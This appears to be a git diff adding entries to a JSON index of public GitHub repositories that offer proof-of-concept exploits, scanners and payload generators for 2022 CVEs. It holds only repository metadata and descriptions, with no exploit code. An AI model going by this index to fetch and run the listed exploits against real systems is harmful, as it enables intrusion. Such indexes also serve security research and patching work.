index b0e4bfe872..0847a011fa 100644
--- a/2022/CVE-2022-34169.json
+++ b/2022/CVE-2022-34169.json
@@ -28,5 +28,35 @@
"watchers": 0,
"score": 0,
"subscribers_count": 1
+ },
+ {
+ "id": 589838604,
+ "name": "AutoGenerateXalanPayload",
+ "full_name": "flowerwind\/AutoGenerateXalanPayload",
+ "owner": {
+ "login": "flowerwind",
+ "id": 35595721,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35595721?v=4",
+ "html_url": "https:\/\/github.com\/flowerwind"
+ },
+ "html_url": "https:\/\/github.com\/flowerwind\/AutoGenerateXalanPayload",
+ "description": "cve-2022-34169 延伸出的Jdk Xalan的payload自动生成工具,可根据不同的Jdk生成出其所对应的xslt文件",
+ "fork": false,
+ "created_at": "2023-01-17T03:48:11Z",
+ "updated_at": "2024-05-16T09:33:06Z",
+ "pushed_at": "2023-01-17T12:27:08Z",
+ "stargazers_count": 85,
+ "watchers_count": 85,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 85,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2022/CVE-2022-34527.json b/2022/CVE-2022-34527.json
new file mode 100644
index 0000000000..76d0ac6456
--- /dev/null
+++ b/2022/CVE-2022-34527.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 629316987,
+ "name": "CVE-2022-34527_D-Link_DSL-3782_Router_command_injection",
+ "full_name": "FzBacon\/CVE-2022-34527_D-Link_DSL-3782_Router_command_injection",
+ "owner": {
+ "login": "FzBacon",
+ "id": 48304150,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48304150?v=4",
+ "html_url": "https:\/\/github.com\/FzBacon"
+ },
+ "html_url": "https:\/\/github.com\/FzBacon\/CVE-2022-34527_D-Link_DSL-3782_Router_command_injection",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-04-18T04:26:49Z",
+ "updated_at": "2023-04-18T04:27:04Z",
+ "pushed_at": "2023-04-18T10:48:02Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-34556.json b/2022/CVE-2022-34556.json
new file mode 100644
index 0000000000..52a8316e34
--- /dev/null
+++ b/2022/CVE-2022-34556.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 595824795,
+ "name": "CVE-2022-34556",
+ "full_name": "Halcy0nic\/CVE-2022-34556",
+ "owner": {
+ "login": "Halcy0nic",
+ "id": 42481692,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42481692?v=4",
+ "html_url": "https:\/\/github.com\/Halcy0nic"
+ },
+ "html_url": "https:\/\/github.com\/Halcy0nic\/CVE-2022-34556",
+ "description": "Proof of concept for CVE-2022-34556",
+ "fork": false,
+ "created_at": "2023-01-31T22:07:50Z",
+ "updated_at": "2023-01-31T22:18:14Z",
+ "pushed_at": "2023-01-31T22:31:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-34683.json b/2022/CVE-2022-34683.json
new file mode 100644
index 0000000000..45bff9932a
--- /dev/null
+++ b/2022/CVE-2022-34683.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 588700609,
+ "name": "CVE-2022-34683",
+ "full_name": "gmh5225\/CVE-2022-34683",
+ "owner": {
+ "login": "gmh5225",
+ "id": 13917777,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13917777?v=4",
+ "html_url": "https:\/\/github.com\/gmh5225"
+ },
+ "html_url": "https:\/\/github.com\/gmh5225\/CVE-2022-34683",
+ "description": "NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape, where a null-pointer dereference occurs, which may lead to denial of service. CVE project by @Sn0wAlice",
+ "fork": false,
+ "created_at": "2023-01-13T19:18:02Z",
+ "updated_at": "2023-02-20T15:21:34Z",
+ "pushed_at": "2023-01-06T23:41:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-34913.json b/2022/CVE-2022-34913.json
new file mode 100644
index 0000000000..0c42ab8e67
--- /dev/null
+++ b/2022/CVE-2022-34913.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 595832872,
+ "name": "CVE-2022-34913",
+ "full_name": "Halcy0nic\/CVE-2022-34913",
+ "owner": {
+ "login": "Halcy0nic",
+ "id": 42481692,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42481692?v=4",
+ "html_url": "https:\/\/github.com\/Halcy0nic"
+ },
+ "html_url": "https:\/\/github.com\/Halcy0nic\/CVE-2022-34913",
+ "description": "Proof of concept for CVE-2022-34913",
+ "fork": false,
+ "created_at": "2023-01-31T22:37:29Z",
+ "updated_at": "2023-01-31T22:37:29Z",
+ "pushed_at": "2023-01-31T23:00:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-3552.json b/2022/CVE-2022-3552.json
new file mode 100644
index 0000000000..30e2620dd2
--- /dev/null
+++ b/2022/CVE-2022-3552.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 622192084,
+ "name": "CVE-2022-3552",
+ "full_name": "kabir0x23\/CVE-2022-3552",
+ "owner": {
+ "login": "kabir0x23",
+ "id": 44284877,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44284877?v=4",
+ "html_url": "https:\/\/github.com\/kabir0x23"
+ },
+ "html_url": "https:\/\/github.com\/kabir0x23\/CVE-2022-3552",
+ "description": "BoxBilling<=4.22.1.5 - Remote Code Execution (RCE)",
+ "fork": false,
+ "created_at": "2023-04-01T11:53:14Z",
+ "updated_at": "2023-12-05T02:10:47Z",
+ "pushed_at": "2023-04-01T15:45:53Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-35649.json b/2022/CVE-2022-35649.json
new file mode 100644
index 0000000000..405e25e3fb
--- /dev/null
+++ b/2022/CVE-2022-35649.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 610209003,
+ "name": "CVE-2022-35649",
+ "full_name": "antoinenguyen-09\/CVE-2022-35649",
+ "owner": {
+ "login": "antoinenguyen-09",
+ "id": 61876488,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61876488?v=4",
+ "html_url": "https:\/\/github.com\/antoinenguyen-09"
+ },
+ "html_url": "https:\/\/github.com\/antoinenguyen-09\/CVE-2022-35649",
+ "description": "Payload Generator and Detailed Analysis about CVE-2022-35649 ",
+ "fork": false,
+ "created_at": "2023-03-06T10:09:59Z",
+ "updated_at": "2023-03-20T10:23:25Z",
+ "pushed_at": "2023-03-07T09:48:30Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-35737.json b/2022/CVE-2022-35737.json
index 2cbd2d3e5a..2f1b6e25b3 100644
--- a/2022/CVE-2022-35737.json
+++ b/2022/CVE-2022-35737.json
@@ -28,5 +28,35 @@
"watchers": 8,
"score": 0,
"subscribers_count": 1
+ },
+ {
+ "id": 604796426,
+ "name": "codeql-cve-2022-35737",
+ "full_name": "rvermeulen\/codeql-cve-2022-35737",
+ "owner": {
+ "login": "rvermeulen",
+ "id": 636626,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/636626?v=4",
+ "html_url": "https:\/\/github.com\/rvermeulen"
+ },
+ "html_url": "https:\/\/github.com\/rvermeulen\/codeql-cve-2022-35737",
+ "description": "A CodeQL query to find CVE 2022-35737",
+ "fork": false,
+ "created_at": "2023-02-21T20:07:45Z",
+ "updated_at": "2023-03-09T10:00:52Z",
+ "pushed_at": "2023-02-21T20:11:47Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2022/CVE-2022-3590.json b/2022/CVE-2022-3590.json
new file mode 100644
index 0000000000..b2ea2c9b96
--- /dev/null
+++ b/2022/CVE-2022-3590.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 652624585,
+ "name": "CVE-2022-3590-WordPress-Vulnerability-Scanner",
+ "full_name": "hxlxmjxbbxs\/CVE-2022-3590-WordPress-Vulnerability-Scanner",
+ "owner": {
+ "login": "hxlxmjxbbxs",
+ "id": 96540322,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96540322?v=4",
+ "html_url": "https:\/\/github.com\/hxlxmjxbbxs"
+ },
+ "html_url": "https:\/\/github.com\/hxlxmjxbbxs\/CVE-2022-3590-WordPress-Vulnerability-Scanner",
+ "description": " This repository contains a Python script that checks WordPress websites for the CVE-2022-3590 vulnerability, which exploits an unauthenticated blind Server-Side Request Forgery (SSRF) in the WordPress pingback feature.",
+ "fork": false,
+ "created_at": "2023-06-12T13:06:54Z",
+ "updated_at": "2024-05-02T03:39:11Z",
+ "pushed_at": "2023-06-12T18:25:51Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-35914.json b/2022/CVE-2022-35914.json
index d0793d64e3..4022b66686 100644
--- a/2022/CVE-2022-35914.json
+++ b/2022/CVE-2022-35914.json
@@ -119,6 +119,36 @@
"score": 0,
"subscribers_count": 1
},
+ {
+ "id": 610523538,
+ "name": "CVE-2022-35914",
+ "full_name": "Johnermac\/CVE-2022-35914",
+ "owner": {
+ "login": "Johnermac",
+ "id": 115858996,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115858996?v=4",
+ "html_url": "https:\/\/github.com\/Johnermac"
+ },
+ "html_url": "https:\/\/github.com\/Johnermac\/CVE-2022-35914",
+ "description": "Script in Ruby for the CVE-2022-35914 - RCE in GLPI ",
+ "fork": false,
+ "created_at": "2023-03-07T00:07:28Z",
+ "updated_at": "2023-07-18T00:58:55Z",
+ "pushed_at": "2023-03-07T00:20:08Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 791130439,
"name": "CVE-2022-35914",
diff --git a/2022/CVE-2022-36193.json b/2022/CVE-2022-36193.json
new file mode 100644
index 0000000000..c1dfb7973a
--- /dev/null
+++ b/2022/CVE-2022-36193.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 616849946,
+ "name": "CVE-2022-36193",
+ "full_name": "G37SYS73M\/CVE-2022-36193",
+ "owner": {
+ "login": "G37SYS73M",
+ "id": 77768845,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77768845?v=4",
+ "html_url": "https:\/\/github.com\/G37SYS73M"
+ },
+ "html_url": "https:\/\/github.com\/G37SYS73M\/CVE-2022-36193",
+ "description": "SQL injection in School Management System 1.0 allows remote attackers to modify or delete data, causing persistent changes to the application's content or behavior by using malicious SQL queries.",
+ "fork": false,
+ "created_at": "2023-03-21T08:00:49Z",
+ "updated_at": "2023-03-21T08:00:49Z",
+ "pushed_at": "2023-03-21T08:01:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-3656.json b/2022/CVE-2022-3656.json
new file mode 100644
index 0000000000..2cc52b8e1c
--- /dev/null
+++ b/2022/CVE-2022-3656.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 588408716,
+ "name": "CVE-2022-3656",
+ "full_name": "momika233\/CVE-2022-3656",
+ "owner": {
+ "login": "momika233",
+ "id": 56291820,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56291820?v=4",
+ "html_url": "https:\/\/github.com\/momika233"
+ },
+ "html_url": "https:\/\/github.com\/momika233\/CVE-2022-3656",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-01-13T03:26:14Z",
+ "updated_at": "2024-01-19T06:31:55Z",
+ "pushed_at": "2023-01-13T03:35:05Z",
+ "stargazers_count": 39,
+ "watchers_count": 39,
+ "has_discussions": false,
+ "forks_count": 10,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 10,
+ "watchers": 39,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-36752.json b/2022/CVE-2022-36752.json
new file mode 100644
index 0000000000..e7f8d565da
--- /dev/null
+++ b/2022/CVE-2022-36752.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 595842528,
+ "name": "CVE-2022-36752",
+ "full_name": "Halcy0nic\/CVE-2022-36752",
+ "owner": {
+ "login": "Halcy0nic",
+ "id": 42481692,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42481692?v=4",
+ "html_url": "https:\/\/github.com\/Halcy0nic"
+ },
+ "html_url": "https:\/\/github.com\/Halcy0nic\/CVE-2022-36752",
+ "description": "Proof of concept for CVE-2022-36752",
+ "fork": false,
+ "created_at": "2023-01-31T23:14:06Z",
+ "updated_at": "2023-01-31T23:14:06Z",
+ "pushed_at": "2023-01-31T23:51:30Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-36804.json b/2022/CVE-2022-36804.json
index 71a23f1e5a..31e673072b 100644
--- a/2022/CVE-2022-36804.json
+++ b/2022/CVE-2022-36804.json
@@ -415,5 +415,65 @@
"watchers": 0,
"score": 0,
"subscribers_count": 1
+ },
+ {
+ "id": 592304483,
+ "name": "cve-2022-36804",
+ "full_name": "walnutsecurity\/cve-2022-36804",
+ "owner": {
+ "login": "walnutsecurity",
+ "id": 92915142,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92915142?v=4",
+ "html_url": "https:\/\/github.com\/walnutsecurity"
+ },
+ "html_url": "https:\/\/github.com\/walnutsecurity\/cve-2022-36804",
+ "description": "A critical command injection vulnerability was found in multiple API endpoints of the Atlassian Bit bucket Server and Data center. This vulnerability affects all versions of Bitbucket Server and Data Center released before versions <7.6.17, <7.17.10, <7.21.4, <8.0.3, <8.1.2, <8.2.2, and <8.3.1",
+ "fork": false,
+ "created_at": "2023-01-23T12:51:09Z",
+ "updated_at": "2023-10-26T14:49:44Z",
+ "pushed_at": "2023-01-25T10:04:41Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 596350876,
+ "name": "Atlassian-Bitbucket-CVE-2022-36804",
+ "full_name": "imbas007\/Atlassian-Bitbucket-CVE-2022-36804",
+ "owner": {
+ "login": "imbas007",
+ "id": 100182585,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100182585?v=4",
+ "html_url": "https:\/\/github.com\/imbas007"
+ },
+ "html_url": "https:\/\/github.com\/imbas007\/Atlassian-Bitbucket-CVE-2022-36804",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-02-02T01:42:26Z",
+ "updated_at": "2023-02-02T01:55:08Z",
+ "pushed_at": "2023-02-02T02:58:40Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2022/CVE-2022-36944.json b/2022/CVE-2022-36944.json
new file mode 100644
index 0000000000..05e28769a5
--- /dev/null
+++ b/2022/CVE-2022-36944.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 641498684,
+ "name": "lazylist-cve-poc",
+ "full_name": "yarocher\/lazylist-cve-poc",
+ "owner": {
+ "login": "yarocher",
+ "id": 71639641,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71639641?v=4",
+ "html_url": "https:\/\/github.com\/yarocher"
+ },
+ "html_url": "https:\/\/github.com\/yarocher\/lazylist-cve-poc",
+ "description": "POC for the CVE-2022-36944 vulnerability exploit",
+ "fork": false,
+ "created_at": "2023-05-16T15:38:49Z",
+ "updated_at": "2023-10-03T02:55:57Z",
+ "pushed_at": "2023-05-16T15:50:03Z",
+ "stargazers_count": 10,
+ "watchers_count": 10,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 10,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-37032.json b/2022/CVE-2022-37032.json
new file mode 100644
index 0000000000..b62d7ac08b
--- /dev/null
+++ b/2022/CVE-2022-37032.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 604134446,
+ "name": "CVE-2022-37032",
+ "full_name": "spwpun\/CVE-2022-37032",
+ "owner": {
+ "login": "spwpun",
+ "id": 32606457,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32606457?v=4",
+ "html_url": "https:\/\/github.com\/spwpun"
+ },
+ "html_url": "https:\/\/github.com\/spwpun\/CVE-2022-37032",
+ "description": "PoC for CVE-2022-37032,tested on frr-8.3。",
+ "fork": false,
+ "created_at": "2023-02-20T12:07:22Z",
+ "updated_at": "2023-06-08T00:39:31Z",
+ "pushed_at": "2023-02-20T12:13:53Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-37332.json b/2022/CVE-2022-37332.json
new file mode 100644
index 0000000000..50ad028522
--- /dev/null
+++ b/2022/CVE-2022-37332.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 590713271,
+ "name": "CVE-2022-37332-RCE-",
+ "full_name": "SpiralBL0CK\/CVE-2022-37332-RCE-",
+ "owner": {
+ "login": "SpiralBL0CK",
+ "id": 25670930,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25670930?v=4",
+ "html_url": "https:\/\/github.com\/SpiralBL0CK"
+ },
+ "html_url": "https:\/\/github.com\/SpiralBL0CK\/CVE-2022-37332-RCE-",
+ "description": "CURRENTLY UNDER WORK... ALL I NEED TO IMPLEMENT IS JIT SPRAYING ..... ",
+ "fork": false,
+ "created_at": "2023-01-19T02:41:54Z",
+ "updated_at": "2023-01-19T02:43:59Z",
+ "pushed_at": "2023-01-19T03:11:07Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-37706.json b/2022/CVE-2022-37706.json
index 9280975d29..3ece1abac4 100644
--- a/2022/CVE-2022-37706.json
+++ b/2022/CVE-2022-37706.json
@@ -59,6 +59,36 @@
"score": 0,
"subscribers_count": 1
},
+ {
+ "id": 632617330,
+ "name": "CVE-2022-37706-LPE-exploit",
+ "full_name": "GrayHatZone\/CVE-2022-37706-LPE-exploit",
+ "owner": {
+ "login": "GrayHatZone",
+ "id": 128262911,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128262911?v=4",
+ "html_url": "https:\/\/github.com\/GrayHatZone"
+ },
+ "html_url": "https:\/\/github.com\/GrayHatZone\/CVE-2022-37706-LPE-exploit",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-04-25T19:28:32Z",
+ "updated_at": "2023-04-26T02:22:54Z",
+ "pushed_at": "2023-04-25T19:28:41Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 809545292,
"name": "CVE-2022-37706",
diff --git a/2022/CVE-2022-3786.json b/2022/CVE-2022-3786.json
new file mode 100644
index 0000000000..e2312377a0
--- /dev/null
+++ b/2022/CVE-2022-3786.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 587877422,
+ "name": "openssl-fuzz",
+ "full_name": "WhatTheFuzz\/openssl-fuzz",
+ "owner": {
+ "login": "WhatTheFuzz",
+ "id": 7316170,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7316170?v=4",
+ "html_url": "https:\/\/github.com\/WhatTheFuzz"
+ },
+ "html_url": "https:\/\/github.com\/WhatTheFuzz\/openssl-fuzz",
+ "description": "Finding CVE-2022-3786 (openssl) with Mayhem",
+ "fork": false,
+ "created_at": "2023-01-11T19:52:43Z",
+ "updated_at": "2023-06-26T00:07:20Z",
+ "pushed_at": "2023-01-11T19:55:11Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-38181.json b/2022/CVE-2022-38181.json
new file mode 100644
index 0000000000..218f10a992
--- /dev/null
+++ b/2022/CVE-2022-38181.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 627438040,
+ "name": "CVE_2022_38181_Raven",
+ "full_name": "Pro-me3us\/CVE_2022_38181_Raven",
+ "owner": {
+ "login": "Pro-me3us",
+ "id": 106105250,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106105250?v=4",
+ "html_url": "https:\/\/github.com\/Pro-me3us"
+ },
+ "html_url": "https:\/\/github.com\/Pro-me3us\/CVE_2022_38181_Raven",
+ "description": "CVE-2022-38181 POC for FireTV 2nd gen Cube (raven)",
+ "fork": false,
+ "created_at": "2023-04-13T13:19:04Z",
+ "updated_at": "2024-05-30T04:17:12Z",
+ "pushed_at": "2023-06-15T17:08:34Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 627440720,
+ "name": "CVE_2022_38181_Gazelle",
+ "full_name": "Pro-me3us\/CVE_2022_38181_Gazelle",
+ "owner": {
+ "login": "Pro-me3us",
+ "id": 106105250,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106105250?v=4",
+ "html_url": "https:\/\/github.com\/Pro-me3us"
+ },
+ "html_url": "https:\/\/github.com\/Pro-me3us\/CVE_2022_38181_Gazelle",
+ "description": "CVE-2022-38181 POC for FireTV 3rd gen Cube (gazelle)",
+ "fork": false,
+ "created_at": "2023-04-13T13:25:09Z",
+ "updated_at": "2023-07-03T11:02:52Z",
+ "pushed_at": "2023-06-29T01:56:06Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-38374.json b/2022/CVE-2022-38374.json
index a2fa69032c..a75f917a5d 100644
--- a/2022/CVE-2022-38374.json
+++ b/2022/CVE-2022-38374.json
@@ -28,5 +28,35 @@
"watchers": 9,
"score": 0,
"subscribers_count": 1
+ },
+ {
+ "id": 609274446,
+ "name": "CVE-2022-38374",
+ "full_name": "M4fiaB0y\/CVE-2022-38374",
+ "owner": {
+ "login": "M4fiaB0y",
+ "id": 95071636,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95071636?v=4",
+ "html_url": "https:\/\/github.com\/M4fiaB0y"
+ },
+ "html_url": "https:\/\/github.com\/M4fiaB0y\/CVE-2022-38374",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-03-03T18:43:02Z",
+ "updated_at": "2023-03-04T02:51:43Z",
+ "pushed_at": "2023-03-03T18:46:21Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2022/CVE-2022-39073.json b/2022/CVE-2022-39073.json
new file mode 100644
index 0000000000..d177131220
--- /dev/null
+++ b/2022/CVE-2022-39073.json
@@ -0,0 +1,41 @@
+[
+ {
+ "id": 586354436,
+ "name": "CVE-2022-39073",
+ "full_name": "v0lp3\/CVE-2022-39073",
+ "owner": {
+ "login": "v0lp3",
+ "id": 20267645,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20267645?v=4",
+ "html_url": "https:\/\/github.com\/v0lp3"
+ },
+ "html_url": "https:\/\/github.com\/v0lp3\/CVE-2022-39073",
+ "description": "Proof of concept for the command injection vulnerability affecting the ZTE MF286R router, including an RCE exploit.",
+ "fork": false,
+ "created_at": "2023-01-07T20:46:20Z",
+ "updated_at": "2023-09-13T11:53:59Z",
+ "pushed_at": "2023-01-07T20:54:07Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "command-injection",
+ "cve-2022-39073",
+ "exploit",
+ "iot",
+ "mf286r",
+ "rce",
+ "router",
+ "zte"
+ ],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-3910.json b/2022/CVE-2022-3910.json
new file mode 100644
index 0000000000..1d04e9287c
--- /dev/null
+++ b/2022/CVE-2022-3910.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 613743412,
+ "name": "CVE-2022-3910",
+ "full_name": "veritas501\/CVE-2022-3910",
+ "owner": {
+ "login": "veritas501",
+ "id": 25763545,
